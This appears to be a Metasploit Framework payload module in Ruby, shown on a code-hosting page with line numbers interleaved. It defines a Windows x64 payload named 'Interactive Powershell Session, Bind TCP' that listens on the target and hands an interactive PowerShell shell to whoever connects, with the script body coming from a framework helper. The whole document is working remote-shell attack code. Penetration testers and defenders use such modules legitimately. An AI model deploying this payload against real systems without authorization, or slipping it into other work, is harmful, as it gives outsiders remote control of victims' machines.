Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
require 'rex/powershell'
6

7
###
8
#
9
# Extends the Exec payload run a powershell command
10
#
11
###
12
module MetasploitModule
13
  CachedSize = :dynamic
14

15
  include Msf::Payload::Windows::Exec_x64
16
  include Rex::Powershell::Command
17
  include Msf::Payload::Windows::Powershell
18

19
  def initialize(info = {})
20
    super(
21
      update_info(
22
        info,
23
        'Name' => 'Windows Interactive Powershell Session, Bind TCP',
24
        'Description' => 'Listen for a connection and spawn an interactive powershell session',
25
        'Author' => [
26
          'Ben Turner', # benpturner
27
          'Dave Hardy' # davehardy20
28
        ],
29
        'References' => [
30
          ['URL', 'https://blog.nettitude.com/uk/interactive-powershell-session-via-metasploit']
31
        ],
32
        'License' => MSF_LICENSE,
33
        'Platform' => 'win',
34
        'Arch' => ARCH_X64,
35
        'Handler' => Msf::Handler::BindTcp,
36
        'Session' => Msf::Sessions::PowerShell
37
      )
38
    )
39
  end
40

41
  #
42
  # Override the exec command string
43
  #
44
  def powershell_command
45
    generate_powershell_code('Bind')
46
  end
47
end
48

49